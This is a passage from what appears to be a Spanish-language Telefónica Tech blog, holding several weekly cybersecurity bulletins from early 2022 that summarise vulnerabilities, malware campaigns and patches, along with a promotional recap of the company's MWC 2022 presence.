obtenido un beneficio de más de un millón de euros hasta la fecha. Toda la info: https://seguranca-informatica.pt/shopping-trap-the-online-stores-scam-that-hits-users-worldwide/
1 de abril de 2022
Boletín semanal ciberseguridad 19 – 25 de marzo
Vulnerabilidad de elevación de privilegios en Western Digital El investigador independiente de seguridad, Xavier Danest, ha reportado una vulnerabilidad de escalada de privilegios en EdgeRover. Cabe resaltar que EdgeRover es un software desarrollado por el fabricante de productos de almacenamiento Western Digital, destinado a la administración de contenido, mediante la unificación de múltiples dispositivos de almacenamiento, bajo una única interfaz. Identificada como CVE-2022-22988, la vulnerabilidad se ha calificado como crítica con un CVSSv3 de 9.1 ya que, debido a un error de cruce de directorios, permitiría a un atacante que previamente haya comprometido el sistema objetivo, conseguir acceso no autorizado a directorios y archivos restringidos, lo que adicionalmente podría conducir a una escala da de privilegios locales, divulgación de información confidencial o ataques de denegación de servicio (DoS). El fallo afecta a las versiones de escritorio de EdgeRover para Windows y Mac, y por el momento se desconoce si se estaría explotando activamente en la red. Por su parte, Western Digital ya ha corregido los permisos de archivos y directorios para evitar el acceso y la modificación no autorizada, y recomienda actualizar EdgeRover a la versión 1.5.1-594 o posterior, que resuelve esta vulnerabilidad. Más información: https://www.westerndigital.com/support/product-security/wdc-22004-edgerover-desktop-app-version-1-5-1-594 Serpent: nuevo backdoor que apunta a organizaciones francesas Investigadores de Proofpoint han descubierto un nuevo backdoor que estaría siendo dirigido contra entidades francesas de los sectores de la construcción y gubernamental. La campaña detectada hace uso de documentos de Microsoft Word habilitados para macros bajo el pretexto de información relacionada con el RGPD, con el fin de distribuir Chocolatey, un instalador de paquetes legítimo y de código abierto que, tras diferentes técnicas de ocultación como la esteganografía y bypass mediante tareas programadas, implementará la puerta trasera a la que Proofpoint ha denominado “Serpent”. Una vez que la cadena de infección concluye con éxito, el atacante estaría capacitado para administrar el host objetivo desde su servidor de Command & Control (C2), exfiltrar información confidencial o incluso distribuir nuevos payloads adicionales. Proofpoint destaca la posibilidad de que “Serpent” se trate de una amenaza avanzada y dirigida, atendiendo a sus comportamientos dirigidos y únicos como la esteganografía, si bien actualmente no existen evidencias que permitan su atribución a ningún grupo conocido específico. Todos los detalles: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain Vulnerabilidades críticas en modelos de impresoras HP HP ha publicado recientemente dos boletines de seguridad en donde informa sobre vulnerabilidades críticas que afectan a cientos de modelos de impresoras de la compañía de las marcas LaserJet Pro, Pagewide Pro, OfficeJet, Enterprise, Large Format y DeskJet. Por una parte, el pasado día 21 de marzo HP publicaba un aviso de seguridad (HPSBPI03780) aludiendo a la identificación del fallo de seguridad catalogado como CVE-2022-3942, CVSS 8.4. Según indican, se trata de un fallo de desbordamiento de búfer que podría desencadenar en ejecución remota de código. Por otra parte, el segundo boletín (HPSBPI03781) contiene otras tres vulnerabilidades, siendo dos de ellas catalogadas como críticas, concretamente VE-2022-24292 y CVE-2022-24293, CVSS 9.8. La explotación de estas vulnerabilidades podría permitir que actores maliciosos pudieran producir divulgación de información, ejecución remota de código o denegación de servicio. Todos estos fallos de seguridad fueron descubiertos por el equipo Zero Day Initiative de Trend Micro. Cabe indicar que HP ha lanzado actualizaciones de seguridad de firmware para la mayoría de los productos afectados, aunque no todos los modelos contienen parche por el momento. Descubre más información: https://support.hp.com/us-en/document/ish_5948778-5949142-16/hpsbpi03780 Campaña de espionaje usando nueva variante del malware Korplug Investigadores de seguridad de ESET han detectado una campaña maliciosa activa desde hace al menos ocho meses que estaría distribuyendo una nueva variante del troyano de acceso remoto (RAT) Korplug. Según la investigación, la distribución de este malware se estaría llevando a cabo mediante el envío de correos bajo señuelos asociados a eventos actuales como el COVID-19 o relacionados con temáticas institucionales europeas. Entre los objetivos detectados, ESET menciona que la campaña apunta a diplomáticos europeos, proveedores de servicios de internet e institutos de investigación en países como Grecia, Chipre, Sudáfrica, entre otros. Korplug es un troyano asociado anteriormente por su similitud a variantes del malware PlugX que, en función de la campaña o actor amenaza que lo utilice en sus operaciones, puede tener capacidades de enumerar unidades y directorios, leer y escribir archivos, ejecutar comandos en un escritorio oculto, iniciar sesiones remotas y comunicarse con el servidor Command & Control (C2) de los atacantes. No obstante, no se descarta que Korplug se encuentre en pleno desarrollo añadiendo nuevas funcionalidades de ocultación. ESET atribuye la autoría de esta campaña al actor amenaza vinculado a China Mustang Panda (aka TA416), conocido por su motivación principalmente enfocada al espionaje político. Más: https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/ Nuevas campañas de APTs norcoreanas explotando 0-day de Chrome Investigadores de Google han identificado nuevas campañas atribuidas a dos grupos de cibercriminales vinculados a Corea del Norte en la que habrían explotado vulnerabilidades de ejecución remota de código en Chrome. La actividad de estos grupos ha sido denominada anteriormente, por un lado, como Operación Dream Job, y por otro lado como Operación AppleJesus. En concreto, estas APTs habrían explotado la vulnerabilidad CVE-2022-0609 durante algo más de un mes, antes de que el parche estuviera disponible el pasado 14 de febrero. La actividad se habría dirigido contra entidades norteamericanas entre las que habría medios de comunicación, organizaciones del sector tecnológico, criptomonedas y de la industria tecnológica financiera, no obstante, es posible que también se haya dirigido contra otros sectores y geografías. En el análisis publicado se detallan las tácticas, técnicas y procedimientos (TTPs), indicadores de compromiso y detalles sobre el exploit utilizado por los atacantes, el cual podría ser aprovechado por otros grupos vinculados a Corea del Norte. Todos los detalles:
25 de marzo de 2022
Boletín semanal ciberseguridad 12 – 18 de marzo
Vishing suplantando a Microsoft La Oficina de Seguridad del Internauta (OSI) ha emitido un aviso de seguridad para informar acerca del incremento, en las últimas semanas, de llamadas fraudulentas en las que un supuesto empleado de Microsoft indica que el dispositivo del usuario está infectado. En este tipo de fraude, conocido como vishing, el atacante insta a la víctima a que instale una aplicación de acceso remoto, la cual, supuestamente, desinfectará el dispositivo. Una vez el ciberdelincuente ha conseguido acceso al equipo del usuario, puede sustraer todo tipo de archivos almacenados en el dispositivo, hacerse con las contraseñas guardadas en el navegador, e incluso instalar un malware que bloquee el equipo para solicitar posteriormente un pago por su desbloqueo. Desde la OSI se recomienda desconectar el dispositivo de la red, desinstalar el programa instalado y utilizar un antivirus, si el usuario ha atendido la llamada y ha instalado el programa mencionado por el ciberdelincuente. Toda la info: https://www.osi.es/es/actualidad/avisos/2022/03/vuelven-las-llamadas-fraudulentas-del-supuesto-soporte-tecnico-de Vulnerabilidad en Netfilter del kernel de Linux El investigador de seguridad Nick Gregory ha descubierto una nueva vulnerabilidad en el kernel de Linux. Este fallo, identificado como CVE-2022-25636 y con un CVSSv3 de 7.8, implica una vulnerabilidad de escritura fuera de límites en Netfilter, un framework del kernel de Linux que permite realizar diversas operaciones con la red como filtrado de paquetes, traducción de direcciones y puertos (NATP), rastreo de conexiones y otro tipo de operaciones de manipulación de paquetes. Un atacante en local podría explotar esta vulnerabilidad para escalar privilegios y ejecutar código arbitrario en el sistema vulnerable. Cabe destacar que el fallo afecta desde la versión 5.4 a la 5.6.10 del kernel de Linux, por lo que se recomienda actualizar a la nueva versión cuanto antes, debido a que existe hay una PoC disponible. Más info: https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/ Variante del troyano brasileño Maxtrilha apunta a usuarios portugueses El investigador Pedro Tavares, de Segurança Informática, ha detectado una posible nueva variante del troyano brasileño conocido como Maxtrilha. Esta variante ha sido detectada distribuyéndose mediante plantillas de phishing donde suplantaban a los servicios de impuestos de Portugal (Autoridade Tributária e Aduaneira), siendo su objetivo usuarios bancarios de dicho país. Los investigadores consideran que este malware es una nueva variante del troyano brasileño Maxtrilha debido a la similitud de las muestras, y a que este utiliza las mismas plantillas para atacar a los usuarios. En los correos maliciosos distribuidos, se incluye una URL que descarga un archivo HTML denominado “Dividas 2021.html” o “Financas.htm”, que posteriormente descarga un archivo ZIP, y que en última instancia descarga el malware. Esta nueva variante puede instalar o modificar los certificados de confianza de Windows, realizar una superposición de ventanas bancarias con el objetivo de robar credenciales, y puede implementar cargas útiles adicionales ejecutadas a través de la técnica de inyección de DLL. Todos los detalles: https://seguranca-informatica.pt/brazilian-trojan-impacting-portuguese-users-and-using-the-same-capabilities-seen-in-other-latin-american-threats/ Apple corrige 87 vulnerabilidades Apple ha publicado 10 boletines de seguridad que corrigen un total de 87 vulnerabilidades en sus diferentes productos y plataformas: iOS 15.4 y iPadOS 15.4, watchOS 8.5, tvOS 15.4, macOS Monterey 12.3, macOS Big Sur 11.6.5, Actualización de seguridad 2022-003 Catalina, Xcode 13.3, Logic Pro X 10.7.3, GarageBand 10.4.6 e iTunes 12.12.3 para Windows. Entre las vulnerabilidades detectadas se encuentran fallos en WebKit (motor de navegador web utilizado por Safari, Mail o App Store) que podrían conducir a la ejecución remota de código (CVE-2022-22610, CVE-2022-22624, CVE-2022-22628 y CVE-2022-22629). También se destacan otras cuatro vulnerabilidades en componentes de visualización de documentos, audio y video en iPhone e iPad que podrían permitir la implantación de malware o la elevación de privilegios (CVE-2022-22633, CVE-2022-22634, CVE-2022-22635 y CVE-2022-22636). Finalmente, cabe destacar que de macOS reciben actualizaciones tanto la versión actual como las dos anteriores, mientras que solo las versiones más actuales de iOS, watchOS, iPadOS, y tvOS son compatibles con estas actualizaciones. Más info: https://nakedsecurity.sophos.com/2022/03/15/apple-patches-87-security-holes-from-iphones-and-macs-to-windows/ LokiLocker: nuevo RaaS con funcionalidad de wiper El equipo de investigadores de BlackBerry ha identificado un nuevo Ransomware as a Service (RaaS) dirigido contra equipos informáticos que utilizan el sistema operativo Windows. Según los expertos, este software malicioso fue descubierto por primera vez a mediados de agosto de 2021, y habría afectado a víctimas en todo el mundo, aunque la mayoría de estas se situarían en Europa y Asía. Entre las características más destacadas de LokiLocker es que está escrito en .NET y protegido con NETGuard, además, también usa KoiVM, un complemento de virtualización que dificulta el análisis del software malicioso y que su uso no es muy común. Asimismo, LokiLocker establece un límite de tiempo para pagar el rescate, si la víctima no accede al chantaje el ransomware, utiliza una función de borrado de archivos del equipo, exceptuando los del sistema, y sobrescribe el registro de arranque maestro (MBR) de la unidad del sistema para inutilizarlo. Todos los detalles: https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware
18 de marzo de 2022
Telefónica Tech en Mobile Word Congress 2022
La edición del MWC 2022 ha sido, sin duda, una de las más concurrida de los últimos años. Con el parón post-pandemia y el aplazamiento del MWC del 2021, aunque sólo hacía 6 meses de la última edición, todos los allí presentes tenían auténticas ganas de verse las caras, hablar de tecnología y tomarse un café. Además, este año desde Telefónica Tech hemos llevado al stand físico de Barcelona y el virtual en el Metaverso de Telefónica, una propuesta muy completa de todas las soluciones de transformación digital para las empresas: soluciones de IoT, Big Data, Blockchain, Ciberseguridad y Cloud. TELEFÓNICA TECH MWC 2023: Todas las innovaciones y el conocimiento experto que hemos compartido 2 de marzo de 2023 Durante todas las jornadas los asistentes físicos en Barcelona también se centraron en la realización de demos presenciales en el stand de Telefónica por el que pasaron más de 2.560 personas. En primer lugar, la demo Smart Industry se podían descubrir los distintos casos de uso de: Automatización: un elemento clave que permite incrementar la eficiencia, reducir costes y sobre todo permitir que los operarios realicen tareas de mayor valor añadido mientras que la tecnología realiza tareas más repetitivas. Sostenibilidad: mediante la aplicación de tecnología IoT, Big Data, 5G, Ciberseguridad, Blockchain y Cloud se puede alargar la vida útil de los recursos y dar respuesta a anomalías energéticas contribuyendo así a proteger el medioambiente. Asistencia remota: a través del brazo robótico hemos visto cómo gracias a la baja latencia que nos proporciona el 5G y a la realidad virtual, podemos dar respuesta a incidentes de manera remota y en tiempo real, lo que permite a las industrias reducir los tiempos de respuesta y minimizar los costes. Y en la demo de Smart Buildings se mostró cómo la creación de edificios inteligentes nos permite llevar una gestión y control integrados, automatizados, más eficientes, saludables y seguros para las personas. También hemos visto cómo, a través de nuestra plataforma de integración, obtenemos una visión centralizada de los datos, que capturamos, analizamos, y procesamos. AI OF THINGS Digitalización industrial: revelamos las claves en Advanced Factories 2023 20 de abril de 2023 Todo este discurso lo hemos trasladado tanto a las sesiones principales organizadas por la GSMA como a las protagonizadas en el propio Ágora del stand de Telefónica: '𝐈𝐧𝐧𝐨𝐯𝐚𝐭𝐢𝐧𝐠 𝐚𝐜𝐫𝐨𝐬𝐬 𝐛𝐮𝐬𝐢𝐧𝐞𝐬𝐬; 𝐦𝐨𝐯𝐢𝐧𝐠 𝐧𝐨𝐰 𝐭𝐨 𝐧𝐞𝐱𝐭' con Elena Gil Lizasoain participando en mesa redonda sobre la importancia de la diversidad y la inclusión como una apuesta imprescindible para impulsar el valor de las empresas. '𝐃𝐞𝐫𝐞𝐜𝐡𝐨𝐬 𝐝𝐢𝐠𝐢𝐭𝐚𝐥𝐞𝐬 𝐲 𝐎𝐃𝐒: 𝐞𝐦𝐩𝐫𝐞𝐬𝐚𝐬 𝐬𝐨𝐬𝐭𝐞𝐧𝐢𝐛𝐥𝐞𝐬 𝐚𝐧𝐭𝐞 𝐞𝐥 𝐝𝐞𝐬𝐚𝐟𝐢́𝐨 𝐝𝐞 𝐥𝐨𝐬 𝐝𝐞𝐫𝐞𝐜𝐡𝐨𝐬 𝐝𝐢𝐠𝐢𝐭𝐚𝐥𝐞𝐬'. Donde de nuevo Elena Gil Lizasoain defendió la convicción de las empresas frente a la necesidad de la digitalización y el enorme papel que juega el talento, y en especial las personas, para llevar a cabo este proceso de transformación. "𝐶𝑎𝑑𝑎 𝑣𝑒𝑧 𝑚𝑎́𝑠 𝑙𝑜𝑠 𝑐𝑙𝑖𝑒𝑛𝑡𝑒𝑠, 𝑙𝑜𝑠 𝑒𝑚𝑝𝑙𝑒𝑎𝑑𝑜𝑠 𝑦 𝑙𝑜𝑠 𝑖𝑛𝑣𝑒𝑟𝑠𝑜𝑟𝑒𝑠 𝑑𝑒𝑚𝑎𝑛𝑑𝑎𝑛 𝑡𝑟𝑎𝑏𝑎𝑗𝑎𝑟 𝑐𝑜𝑛 𝑙𝑎𝑠 𝑒𝑚𝑝𝑟𝑒𝑠𝑎𝑠 𝑞𝑢𝑒 𝑠𝑜𝑛 𝑠𝑜𝑠𝑡𝑒𝑛𝑖𝑏𝑙𝑒𝑠" '𝐊𝐢𝐜𝐤𝐬𝐭𝐚𝐫𝐭𝐢𝐧𝐠 𝟓𝐆 𝐟𝐨𝐫 𝐌𝐚𝐧𝐮𝐟𝐚𝐜𝐭𝐮𝐫𝐢𝐧𝐠' con Andres Escribano Riesco hablando sobre industria inteligente y cómo el 5G y las tecnologías digitales nos están permitiendo desarrollar casos de uso en el mundo real. '𝐌𝐚𝐤𝐢𝐧𝐠 𝐬𝐞𝐧𝐬𝐞 𝐨𝐟 𝐬𝐞𝐧𝐬𝐨𝐫𝐬' representada por Elena Gil Lizasoain, donde analizamos el papel del IoT y los sensores en la estrategia de las empresas. Y cómo pueden utilizar de forma eficaz los datos recogidos para tomar decisiones inteligentes. Andres Escribano Riesco en su presentación '𝐌𝐚𝐧𝐭𝐞𝐧𝐢𝐦𝐢𝐞𝐧𝐭𝐨 𝐩𝐫𝐞𝐝𝐢𝐜𝐭𝐢𝐯𝐨 𝐜𝐨𝐧 𝐃𝐫𝐨𝐧𝐞𝐬 𝟓𝐆' donde vimos un caso real en el que los drones trabajan para optimizar y analizar las redes eléctricas. 'Ciberseguridad Industrial: retos y soluciones', donde Vicente Segura y Unai Ayucar Carbajo, de Alias Robotics, han expuesto los retos de ciberseguridad que presentan los entornos industriales y cómo afrontarlos. Nuestra experta María Loza Corera formó parte de la mesa redonda ‘In AI we trust?’. Analizaron los distintos retos que plantea la Inteligencia Artificial y las diferentes capas de responsabilidad, ética, cumplimiento legal, regulación… que deben estar presentes en la base de cualquier proyecto de IA. Glyn Povah en ‘The rise of Scam Attacks’. Hablaron sobre cómo el comercio utiliza una tecnología cada vez más sofisticada contra el fraude, quienes usan la ingeniería social como vector de ataque. La sesión ‘Why do we need Smart Buildings?’ donde analizamos la importancia de contar con edificios cada vez más inteligentes: "𝐸𝑙 89% 𝑑𝑒 𝑛𝑢𝑒𝑠𝑡𝑟𝑜 𝑡𝑖𝑒𝑚𝑝𝑜 𝑙𝑜 𝑝𝑎𝑠𝑎𝑚𝑜𝑠 𝑑𝑒𝑛𝑡𝑟𝑜 𝑑𝑒 𝑒𝑑𝑖𝑓𝑖𝑐𝑖𝑜𝑠, 𝑑𝑒 𝑎ℎí 𝑙𝑎 𝑖𝑚𝑝𝑜𝑟𝑡𝑎𝑛𝑐𝑖𝑎 𝑑𝑒 ℎ𝑎𝑐𝑒𝑟𝑙𝑜𝑠 𝑐𝑎𝑑𝑎 𝑣𝑒𝑧 𝑚𝑎́𝑠 𝑠𝑜𝑠𝑡𝑒𝑛𝑖𝑏𝑙𝑒𝑠", afirmaba Carlos Martínez Miguel. Analizamos el caso de éxito de ‘La Torre Outlet Zaragoza’. ‘Digitalización para una transición verde’ dondeafirmaba Maya Ormazabal Herrero: '𝑆𝑜𝑚𝑜𝑠 𝑢𝑛 𝑝𝑎𝑟𝑡𝑛𝑒𝑟 𝑐𝑙𝑎𝑣𝑒 𝑒𝑛 𝑒𝑙 𝑝𝑟𝑜𝑐𝑒𝑠𝑜 𝑑𝑒 𝑑𝑒𝑠𝑐𝑎𝑟𝑏𝑜𝑛𝑖𝑧𝑎𝑐𝑖𝑜́𝑛 𝑦 𝑒𝑠𝑡𝑎𝑚𝑜𝑠 𝑎𝑦𝑢𝑑𝑎𝑛𝑑𝑜 𝑎 𝑛𝑢𝑒𝑠𝑡𝑟𝑜𝑠 𝑐𝑙𝑖𝑒𝑛𝑡𝑒𝑠 𝑒𝑛 𝑒𝑠𝑡𝑎 𝑡𝑟𝑎𝑛𝑠𝑓𝑜𝑟𝑚𝑎𝑐𝑖𝑜́𝑛’. Bajo este paradigma, vimos dos propuestas: el sello ecosmart creado por Telefónica y el caso de éxito de La Marina de València. Sergio De Los Santos añadió información sobre la parte técnica: la tecnología iDoT es un sistema que vincula la identidad del usuario y su consumo, gracias a una conexión segura en la nube y blockchain. Elena Gil Lizasoain en la sesión 'Big Data for a better future: Telcos role in the COVID-19 Pandemic' donde analizó la importancia que tuvo el Big Data a la hora de medir las decisiones que tomaron los gobiernos a la hora de enfrentar la pandemia. En definitiva, Telefónica Tech acude al MWC 2022 con un portfolio amplio, innovador, completo y con casos de éxito que nos avalan. Unos clientes que muestran que la tecnología IoT, Big Data, Ciberseguridad y Cloud son ya una realidad.
14 de marzo de 2022
Boletín semanal ciberseguridad 5 – 11 de marzo
Mozilla parchea dos vulnerabilidades 0-day Mozilla ha emitido un aviso de seguridad donde corrige dos vulnerabilidades 0-day que estarían siendo activamente explotadas y que afectan a Firefox, Focus y Thunderbird. Ambas vulnerabilidades fueron reportadas por el equipo de seguridad de la compañía 360 ATA. La primera de ellas, clasificada como CVE-2022-26485, se trata de una vulnerabilidad de use-after-free en el procesamiento de parámetros XSLT, el cual permite la conversión de documentos. La segunda ha sido clasificada como CVE-2022-26486, y se trata de una vulnerabilidad de use-after-free en el framework WebGPU IPC. En caso de ser aprovechadas, un agente amenaza podría ejecutar código de forma remota, evadiendo la seguridad, pudiendo incluso comprometer el dispositivo mediante la descarga de algún código malicioso. Ambas vulnerabilidades quedan solucionadas en las versiones Firefox 97.0.2, Firefox ESR 91.6.1, Firefox para Android 97.3.0 y Focus 97.3.0. Desde Mozilla recomiendan actualizar a la mayor brevedad posible. Descubre más información: https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/#CVE-2022-26485 Dirty Pipe: nueva vulnerabilidad en el kernel de Linux El investigador de seguridad Max Kellermann ha publicado los detalles de una nueva vulnerabilidad en el kernel de Linux desde su versión 5.8 que permitiría a usuarios locales obtener privilegios de root a través de exploits que ya se encuentran disponibles de forma pública. Identificada con el CVE-2022-0847 y con un CVSSv3 de 7.8, el error permitiría a un usuario local sin privilegios inyectar y sobrescribir datos aleatorios en archivos de solo lectura, incluidos los procesos SUID que se ejecutan como root, conduciendo a una escalada de privilegios en el sistema afectado e incluso posibilitando la manipulación de archivos confidenciales como los localizados en la ruta /etc/passwd, que permitiría eliminar la contraseña del usuario root. En su publicación, el investigador comparte una prueba de concepto (PoC) y señala la similitud de esta vulnerabilidad con “Dirty Cow” (CVE-2016-5195), que salió a la luz en octubre de 2016, aunque en esta ocasión su explotación sería menos compleja y grupos como Anonymous ya se han pronunciado sobre ella. La vulnerabilidad ya ha sido corregida en las versiones Linux 5.16.11, 5.15.25 y 5.10.102, por lo que se recomienda parchear cuanto antes dado el impacto que provocaría una explotación exitosa de este error. Todos los detalles: https://dirtypipe.cm4all.com/ Boletín de actualizaciones de Microsoft Microsoft ha publicado su boletín de seguridad correspondiente al mes de marzo en el que se informa de la corrección de un total de 74 fallos, incluyendo tres vulnerabilidades críticas según la firma y tres 0-days que no estarían siendo activamente explotados. Vulnerabilidades críticas según Microsoft: El fallo más crítico de los tres (CVE-2022-23277 CVSSv3 8.8) afecta a Microsoft Exchange Server y permite a un atacante autenticado dirigirse contra cuentas de servidor con el objetivo de ejecutar código remoto con privilegios de ADMIN, debido a un fallo en la gestión de memoria por parte del servidor. Los otros dos fallos categorizados también como críticos por Microsoft, CVE-2022-22006 y CVE-2022-24501, ambos con CVSSv3 7.8, afectan a las extensiones de video HEVC y VP9 pero su explotación requiere de ingeniería social puesto que se necesita que la víctima descargue y abra un archivo especialmente modificado. 0-days: El fallo de este tipo más grave CVE-2022-21990 CVSSv3 8.8, permite ejecución remota de código en RDP. Algunos investigadores apuntan a que este fallo debería considerarse como crítico y destacan que, aunque no está siendo activamente explotado aún, lo puede ser pronto puesto que ya existe una prueba de concepto disponible. Los otros dos 0-day corregidos son los identificados como CVE-2022-23285 CVSSv3 8.8 y CVE-2022-24503 CVSSv3 5.4. Más: https://msrc.microsoft.com/update-guide/releaseNote/2022-Mar Vulnerabilidades de firmware de UEFI HP, en conjunto con el equipo de Binarly, han descubierto múltiples vulnerabilidades de alto impacto relacionadas con el firmware de UEFI, que estarían afectando a diferentes productos de HP como portátiles y ordenadores de sobremesa, o nodos perimetrales y sistemas de puntos de venta (PoS). Estas han sido clasificadas como CVE-2021-39298 con CVSSv3 8.8, CVE-2021-39297, CVE-2021-39299, CVE-2021-39300 y CVE-2021-39301, todas ellas con CVSSv3 de 7.5. De ser explotadas, un agente amenaza podría inyectar código malicioso, escalar privilegios, así como permanecer en los dispositivos tras las actualizaciones del sistema operativo. Desde HP han proporcionado actualizaciones de firmware y han facilitado instrucciones para actualizar la BIOS. Toda la información: https://support.hp.com/us-en/document/ish_5661066-5661090-16 Análisis del resurgimiento de Emotet Investigadores de Black Lotus Labs han publicado un análisis sobre las evidencias del resurgimiento de la botnet Emotet desde noviembre de 2021. Los investigadores indican que, desde entonces, la botnet ha mostrado un fuerte incremento en su actividad a través de aproximadamente 130.000 bots únicos distribuidos por 179 países, acumulando más de 1,6 millones de dispositivos infectados. El malware resurgió utilizando Trickbot como método de entrega, y a pesar de que la estructura de su Command&Control (C2) habría sido restablecida en noviembre, la adición de bots no fue pronunciada hasta enero. Los detalles técnicos del informe revelan que Emotet ha efectuado destacables cambios en su funcionamiento, tales como el algoritmo utilizado para cifrar el tráfico de red, el cual ahora se basa en criptografía elíptica (ECC); o el cambio de modelo de niveles, marcado por la ausencia de Bot C2, aunque se desconoce si se trata de un cambio eventual o permanente. Debido a que la distribución de Emotet se realiza a través de correos electrónicos comprometidos con adjuntos maliciosos, los investigadores recomiendan intensificar las medidas preventivas contra el phishing y la monitorización de recursos de red para prevenir posibles incidentes derivados. Más info: https://blog.lumen.com/emotet-redux/
11 de marzo de 2022
Boletín semanal ciberseguridad 28 de febrero - 4 de marzo
Daxin: puerta trasera altamente sofisticada El equipo de investigadores de Symantec ha publicado un artículo informando sobre una nueva puerta trasera a la que han denominado Daxin, que atribuyen a actores vinculados a China. Según Symantec, se trataría del malware más avanzado que habrían visto utilizando a agentes amenaza procedentes de dicho país. Daxin permite leer y escribir archivos e iniciar procesos, pero destaca sobre todo por su sigilo y por la forma en que realiza las comunicaciones con su Command & Control. El malware es capaz de secuestrar conexiones TCP/IP legítimas con el objetivo de conseguir un intercambio de claves con su par remoto y, de esta manera, consigue abrir un canal de comunicación cifrado para recibir comandos y enviar respuestas ocultándose entre el tráfico legítimo y evitando así las soluciones de seguridad. Otra funcionalidad destacada es la capacidad que tiene de crear un nuevo canal de comunicación a través de múltiples equipos infectados de una misma red usando un solo comando para un conjunto de nodos. Gracias a ello, consigue restablecer rápidamente las conexiones y los canales de comunicación cifrados. Symantec ha identificado a Daxin en organizaciones gubernamentales, así como en entidades de los sectores de telecomunicaciones, transporte e industria de interés estratégico para China. Los ataques observados se remontan a noviembre de 2021 pero destacan que la muestra más antigua que se ha podido identificar data de 2013. Más info: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage Vulnerabilidad crítica en GitLab GitLab ha publicado una actualización de seguridad que corrige un total de 7 vulnerabilidades que afectan a GitLab Community Edition (CE) y Enterprise Edition (EE). Entre los fallos de seguridad destaca el identificado como CVE-2022-0735, que cuenta con una puntuación CVSS de 9.6. La explotación de esta vulnerabilidad podría permitir a un atacante sin autenticar obtener un token de registro de un runner, lo que posibilitaría la ejecución remota de código. Pese a que los detalles técnicos de la vulnerabilidad no han sido publicados, la explotación de esta sería de baja complejidad y no requeriría privilegios ni interacción por parte del usuario para ser explotada. Esta vulnerabilidad afecta a todas las versiones desde la 12.10 a la 14.6.4, la 14.7 a la 14.7.3, y todas las versiones desde la 14.8 a la 14.8.1. Consecuentemente, GitLab ha recomendado actualizar a las versiones 14.8.2, 14.7.4, y 14.6.5 de GitLab Community Edition (CE) y Enterprise Edition (EE). Todos los detalles: https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/ Distribución de TeaBot a través de la tienda de Google Play Investigadores de Cleafy han publicado un nuevo artículo sobre el troyano bancario TeaBot, también conocido como Anatsa, que habría empezado a distribuirse a través de aplicaciones fraudulentas alojadas en la tienda de Google Play. Este troyano bancario surgía a principios de 2021 y se distribuía fundamentalmente mediante campañas de smishing. Las nuevas muestras, sin embargo, han pasado a usar Google Play como medio para su distribución, ocultándose un dropper de Teabot tras una aplicación de escaneo de códigos QR (QR Code & Barcode – Scanner). Al descargar la aplicación, el dropper solicitará al usuario que la actualice mediante un mensaje emergente. Esta supuesta actualización no será realmente una actualización, sino que se descargará una segunda aplicación (“QR Code Scanner: Add-On”) desde una fuente no confiable. Esta segunda aplicación es la que ya se ha identificado como Teabot, que solicita al usuario permisos a servicios de accesibilidad para obtener privilegios como ver y controlar la pantalla y ver y realizar acciones. Las últimas campañas de Teabot han pasado a soportar idiomas como el ruso, el eslovaco o el chino mandarín, por lo que el malware podría estar expandiendo sus objetivos a nivel geográfico. Más: https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe
4 de marzo de 2022
Boletín semanal ciberseguridad 19-25 de febrero
Nuevo fallo de escalada de privilegios en Linux Investigadores de seguridad de Qualys han descubierto siete fallos en el sistema de empaquetado y despliegue de software Snap de Canonical empleado en sistemas operativos que utilizan el kernel de Linux. La más grave de estas vulnerabilidades, catalogada como CVE-2021-44731 y que habría recibido un CVSSv3 de 7.8, es un error de escalada de privilegios en la función snap-confine, utilizada internamente por la herramienta snapd para construir el entorno de ejecución de las aplicaciones snap. Una explotación exitosa podría permitir a cualquier usuario sin privilegios obtener privilegios de root en el host vulnerable. El fallo fue comunicado a los proveedores y a las distribuciones de código abierto en el momento en que se descubría el pasado mes de octubre, dando lugar a un proceso de divulgación coordinado de parches el 17 de febrero. Los técnicos de Qualys también han desarrollado un exploit para este problema que permite obtener privilegios completos de root en instalaciones predeterminadas de Ubuntu. Las otras seis vulnerabilidades identificadas son: CVE-2021-3995, CVE-2021-3996, CVE-2021-3997, CVE-2021-3998, CVE-2021-3999, CVE-2021-44730. Todos los detalles: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Operadores de ransomware Conti absorben operaciones de TrickBot El equipo de investigadores de Advanced Intelligence ha publicado un informe en el que se indica que el software malicioso TrickBot ha transferido su administración a los operadores de ransomware Conti. Los expertos de AdvIntel han analizado los antecedentes de TrickBot, observándose una relación históricamente estrecha con este ransomware y su posterior apogeo. Conti se ha basado, entre otros factores, en mantener un código de conducta entre sus operadores, lo que les habría favorecido para prosperar y mantenerse en activo frente a otros grupos de ransomware, desmantelados por diversas operaciones policiales. Los expertos apuntan que TrickBot pasó progresivamente a ser subsidiario de los operadores de Conti, al ser los únicos que lo empleasen en sus operaciones. Asimismo, a finales de 2021, Conti finalmente absorbió a múltiples desarrolladores y operadores de TrickBot. Sin embargo, cabe destacar que debido a que las redes de TrickBot estarían siendo facilmente detectadas, los operadores de Conti han comenzado a sustituirlo por el malware BazarBackDoor, que está bajo su desarrollo y es utilizado para conseguir acceso inicial a las redes de sus víctimas. Toda la info: https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works Cobalt Strike distribuido en servidores MS-SQL vulnerables Analistas de ASEC han descubierto una nueva campaña donde servidores vulnerables de Microsoft SQL (MS-SQL) expuestos a internet, estarían siendo atacados por actores maliciosos con el objetivo de distribuir Cobalt Strike en los hosts comprometidos. Los ataques dirigidos a servidores MS-SQL incluyen ataques al entorno donde su vulnerabilidad no ha sido corregida, ataques de fuerza bruta y ataques de diccionario contra servidores mal administrados. En primer lugar, el actor malicioso escanea el puerto 1433 para verificar si hay servidores MS-SQL abiertos al público, para luego llevar a cabo ataques de fuerza bruta o de diccionario contra la cuenta de administrador para intentar iniciar sesión. Diferentes malware como Lemon Duck permiten escanear dicho puerto y se propagan con el 